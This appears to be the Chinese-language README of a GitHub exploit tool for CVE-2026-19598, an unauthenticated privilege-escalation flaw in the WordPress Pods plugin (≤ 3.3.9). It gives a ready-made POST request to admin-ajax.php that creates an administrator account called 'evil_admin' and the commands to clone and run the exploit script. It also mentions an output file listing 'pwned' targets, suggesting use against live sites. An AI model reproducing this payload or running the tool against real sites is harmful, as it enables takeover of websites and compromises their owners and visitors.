严重未认证权限提升漏洞(CVSS 9.8)— WordPress Pods 插件 ≤ 3.3.9
该工具利用 CVE-2026-19598,这是 WordPress Pods 插件中的一个漏洞,允许未认证攻击者通过 admin-ajax.php 端点创建新的管理员账户或覆盖现有用户密码。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-19598 |
| CVSS 评分 | 9.8(严重) |
| CWE | CWE-284 — 访问控制不当 |
| 受影响产品 | WordPress Pods 插件 ≤ 3.3.9 |
| 已修补版本 | 3.3.9.1 |
| 是否需要认证 | 不需要(未认证) |
| 状态 | 正在被积极利用 |
该漏洞存在于 pods_admin AJAX 操作中。由于权限检查不当,当存在 meta-box-loader 参数时,save_user 方法可以在无需认证的情况下被调用。这允许攻击者:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
该插件未能验证发起请求的用户是否具有适当的能力,且 meta-box-loader 参数绕过了预期的安全检查。
pods_pwned.txt 包含所有已利用的目标requests# 克隆仓库
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# 安装依赖(仅需 requests)
pip install requests